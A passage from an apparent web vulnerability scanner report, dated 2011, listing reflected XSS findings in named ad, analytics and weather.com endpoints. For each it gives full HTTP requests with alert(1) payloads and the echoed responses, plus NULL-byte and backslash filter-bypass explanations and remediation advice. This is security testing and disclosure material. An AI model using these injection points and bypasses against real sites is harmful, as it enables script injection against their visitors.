This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/sonycomputerentertai/sc/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491190457-245340&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=SiteCatalyst%3A%20eventf5393<img%20src%3da%20onerror%3dalert(1)>cf7112fc6c7&mboxId=0&mboxTime=1305473203602&visitorNamespace=sonycomputerentertainmentofamerica&pageName=PS&currencyCode=USD&events=prodView%2Cevent2&products=%3B&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx%2Cflv%2Cswf&linkInternalFilters=javascript%3A%2Cus.playstation.com&linkTrackVars=None&linkTrackEvents=None&hier1=PS&eVar2=PS&prop11=1%3A00PM&eVar11=1%3A00PM&prop12=Sunday&eVar12=Sunday&prop13=Weekend&eVar13=Weekend&eVar17=PS&prop21=Logged%20Out&eVar21=Logged%20Out&prop22=New&eVar22=New&prop30=http%3A%2F%2Fus.playstation.com%2F&eVar30=http%3A%2F%2Fus.playstation.com%2F&prop47=PS&mboxURL=http%3A%2F%2Fus.playstation.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 264
Date: Sun, 15 May 2011 20:28:46 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1305491190457-245340.17");mboxFactories.get('default').get('SiteCatalyst: eventf5393<img src=a onerror=alert(1)>cf7112fc6c7', 0).setOffer(new mboxOfferDefault()).loaded();}

5.112. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard [mboxId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sonycomputerentertai.tt.omtrdc.net
Path:   /m2/sonycomputerentertai/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 4483c<script>alert(1)</script>33d87b448fc was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sonycomputerentertai/sc/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491190457-245340&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=SiteCatalyst%3A%20event&mboxId=04483c<script>alert(1)</script>33d87b448fc&mboxTime=1305473203602&visitorNamespace=sonycomputerentertainmentofamerica&pageName=PS&currencyCode=USD&events=prodView%2Cevent2&products=%3B&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx%2Cflv%2Cswf&linkInternalFilters=javascript%3A%2Cus.playstation.com&linkTrackVars=None&linkTrackEvents=None&hier1=PS&eVar2=PS&prop11=1%3A00PM&eVar11=1%3A00PM&prop12=Sunday&eVar12=Sunday&prop13=Weekend&eVar13=Weekend&eVar17=PS&prop21=Logged%20Out&eVar21=Logged%20Out&prop22=New&eVar22=New&prop30=http%3A%2F%2Fus.playstation.com%2F&eVar30=http%3A%2F%2Fus.playstation.com%2F&prop47=PS&mboxURL=http%3A%2F%2Fus.playstation.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 261
Date: Sun, 15 May 2011 20:28:48 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1305491190457-245340.17");mboxFactories.get('default').get('SiteCatalyst: event', 04483c<script>alert(1)</script>33d87b448fc).setOffer(new mboxOfferDefault()).loaded();}

5.113. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b554"%3balert(1)//30a094dd635 was submitted in the action parameter. This input was echoed as 2b554";alert(1)//30a094dd635 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD2b554"%3balert(1)//30a094dd635&cwrun=200&cwadformat=728X90&cwpid=526735&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:19:53 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="526735";var ct="81610";var cf="728X90";var ca="VIEWAD2b554";alert(1)//30a094dd635";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var
...[SNIP]...

5.114. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30707"%3balert(1)//ccec8b5486e was submitted in the cwadformat parameter. This input was echoed as 30707";alert(1)//ccec8b5486e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X9030707"%3balert(1)//ccec8b5486e&cwpid=526735&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:20:07 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="526735";var ct="81610";var cf="728X9030707";alert(1)//ccec8b5486e";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _
...[SNIP]...

5.115. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f535a"%3balert(1)//aa87427b8a9 was submitted in the cwheight parameter. This input was echoed as f535a";alert(1)//aa87427b8a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=523987&cwwidth=728&cwheight=90f535a"%3balert(1)//aa87427b8a9&cwpnet=1&cwtagid=75238 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:22:16 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="523987";var ct="75238";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90f535a";alert(1)//aa87427b8a9";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...

5.116. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f824"%3balert(1)//5d114f1e2c3 was submitted in the cwpid parameter. This input was echoed as 7f824";alert(1)//5d114f1e2c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=5267357f824"%3balert(1)//5d114f1e2c3&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB21
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:20:17 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="5267357f824";alert(1)//5d114f1e2c3";var ct="81610";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())
...[SNIP]...

5.117. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0443"%3balert(1)//1a3fa6ca155 was submitted in the cwpnet parameter. This input was echoed as a0443";alert(1)//1a3fa6ca155 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=523987&cwwidth=728&cwheight=90&cwpnet=1a0443"%3balert(1)//1a3fa6ca155&cwtagid=75238 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP202
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 13 May 02011 21:49:10 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5916
Date: Mon, 16 May 2011 01:22:22 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 16-May-2011 04:09:02 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="523987";var cwtagid="75238";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="523987";var ct="75238";var cf="728X90";var cn="1a0443";alert(1)//1a3fa6ca155";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl=
...[SNIP]...

5.118. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3ccc"%3balert(1)//92d61175cab was submitted in the cwrun parameter. This input was echoed as f3ccc";alert(1)//92d61175cab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200f3ccc"%3balert(1)//92d61175cab&cwadformat=728X90&cwpid=526735&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:20:00 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="526735";var ct="81610";var cf="728X90";var ca="VIEWAD";var cr="200f3ccc";alert(1)//92d61175cab";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;
...[SNIP]...

5.119. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ca89"%3balert(1)//7f75bf95394 was submitted in the cwtagid parameter. This input was echoed as 2ca89";alert(1)//7f75bf95394 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=523987&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=752382ca89"%3balert(1)//7f75bf95394 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP201
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Sat, 14 May 02011 11:14:24 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5944
Date: Mon, 16 May 2011 01:22:27 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 16-May-2011 04:09:07 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="523987";var cwtagid="752382ca89";alert(1)//7f75bf95394";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="523987";var ct="752382ca89";alert(1)//7f75bf95394";var cf="728X90";var cn="1";String.prototype.cwcon
...[SNIP]...

5.120. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00dbddc"%3balert(1)//2ec3f6439ea was submitted in the cwwidth parameter. This input was echoed as dbddc";alert(1)//2ec3f6439ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=526735&cwwidth=728%00dbddc"%3balert(1)//2ec3f6439ea&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:20:27 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="526735";var ct="81610";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728.dbddc";alert(1)//2ec3f6439ea";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="und
...[SNIP]...

5.121. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94823"%3balert(1)//da5a2530254 was submitted in the cwwidth parameter. This input was echoed as 94823";alert(1)//da5a2530254 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=523987&cwwidth=72894823"%3balert(1)//da5a2530254&cwheight=90&cwpnet=1&cwtagid=75238 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 13 May 02011 21:46:58 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:21:25 GMT
Content-Length: 5916
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 16-May-2011 04:08:05 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="523987";var cwtagid="75238";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="72894823";alert(1)//da5a2530254";var ch="90";var cads="0";var cp="523987";var ct="75238";var cf="728X90";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];
...[SNIP]...

5.122. http://wow.weather.com/weather/wow/module/USNY0400 [config parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wow.weather.com
Path:   /weather/wow/module/USNY0400

Issue detail

The value of the config request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c278\'%3balert(1)//0c2af714aa4 was submitted in the config parameter. This input was echoed as 1c278\\';alert(1)//0c2af714aa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

